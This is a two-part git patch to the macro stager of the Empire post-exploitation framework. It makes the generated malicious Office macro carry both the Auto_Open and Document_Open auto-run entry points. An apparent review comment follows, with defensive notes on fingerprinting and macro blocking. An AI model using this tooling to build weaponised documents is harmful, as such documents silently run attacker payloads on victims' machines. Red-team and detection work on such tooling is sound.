From 3b8d18a41ed344d4c70566ef223ac4b2a1af0fac Mon Sep 17 00:00:00 2001
From: Jeff McCutchan
Date: Wed, 14 Oct 2015 17:08:43 -0400
Subject: [PATCH 1/2] Added "LegacyMacro" option which creates a macro compatible with Office 97-2003 documents.
---
 lib/stagers/macro.py | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)
diff --git a/lib/stagers/macro.py b/lib/stagers/macro.py
index d315b80..ddf847f 100644
--- a/lib/stagers/macro.py
+++ b/lib/stagers/macro.py
@@ -44,6 +44,11 @@ class Stager:
 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
 'Required' : False,
 'Value' : 'default'
+ },
+ 'LegacyMacro' : {
+ 'Description' : 'Generate macro compatible with office 97-2003 documents so a ".xls" extension can be used (True or False).',
+ 'Required' : True,
+ 'Value' : 'False'
 }
 }
@@ -65,6 +70,7 @@ class Stager:
 userAgent = self.options['UserAgent']['Value']
 proxy = self.options['Proxy']['Value']
 proxyCreds = self.options['ProxyCreds']['Value']
+ legacyMacro = self.options['LegacyMacro']['Value']
 # generate the launcher code
 launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
@@ -79,7 +85,10 @@ class Stager:
 for chunk in chunks[1:]:
 payload += "\tstr = str + \"" + str(chunk) + "\"\n"
- macro = "Sub Document_Open()\n"
+ if legacyMacro == 'True':
+ macro = "Sub Auto_Open()\n"
+ else:
+ macro = "Sub Document_Open()\n"
 macro += "\tDebugging\n"
 macro += "End Sub\n\n"
From eb779309d2a58d17c59e1f57266270d87d243495 Mon Sep 17 00:00:00 2001
From: Jeff McCutchan
Date: Thu, 15 Oct 2015 14:24:42 -0400
Subject: [PATCH 2/2] Changed the macro to support both file types
---
 lib/stagers/macro.py | 16 +++++-----------
 1 file changed, 5 insertions(+), 11 deletions(-)
diff --git a/lib/stagers/macro.py b/lib/stagers/macro.py
index ddf847f..6c5e4a5 100644
--- a/lib/stagers/macro.py
+++ b/lib/stagers/macro.py
@@ -9,7 +9,7 @@ class Stager:
 'Author': ['@enigma0x3', '@harmj0y'],
- 'Description': ('Generates an office macro for Empire.'),
+ 'Description': ('Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.'),
 'Comments': [
 'http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/'
@@ -44,11 +44,6 @@ class Stager:
 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
 'Required' : False,
 'Value' : 'default'
- },
- 'LegacyMacro' : {
- 'Description' : 'Generate macro compatible with office 97-2003 documents so a ".xls" extension can be used (True or False).',
- 'Required' : True,
- 'Value' : 'False'
 }
 }
@@ -70,7 +65,6 @@ class Stager:
 userAgent = self.options['UserAgent']['Value']
 proxy = self.options['Proxy']['Value']
 proxyCreds = self.options['ProxyCreds']['Value']
- legacyMacro = self.options['LegacyMacro']['Value']
 # generate the launcher code
 launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
@@ -85,10 +79,10 @@ class Stager:
 for chunk in chunks[1:]:
 payload += "\tstr = str + \"" + str(chunk) + "\"\n"
- if legacyMacro == 'True':
- macro = "Sub Auto_Open()\n"
- else:
- macro = "Sub Document_Open()\n"
+ macro = "Sub Auto_Open()\n"
+ macro += "\tDebugging\n"
+ macro += "End Sub\n\n"
+ macro += "Sub Document_Open()\n"
 macro += "\tDebugging\n"
 macro += "End Sub\n\n"
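Review bot: The last hunk now emits both `Sub Auto_Open()` and `Sub Document_Open()` unconditionally, each calling `Debugging`, and nothing in the code records why both are there once the `LegacyMacro` option is removed. A one-line comment above `macro = "Sub Auto_Open()\n"`, such as `# both auto-run entry points are always emitted; each only calls Debugging`, would keep that intent visible. The reworded 'Description' in the first hunk frames the two names as Office 97-2003 versus 2007 file types; which name a document honours appears to depend on the host application rather than the file format, so that wording is worth confirming. On the defensive side the output is a fixed fingerprint, since every generated document carries both auto-run procedure names plus a procedure called `Debugging`; macro-inspection rules can match on that, and blocking macros in files from untrusted sources stops both entry points. The enclosing method starts and ends outside the hunk.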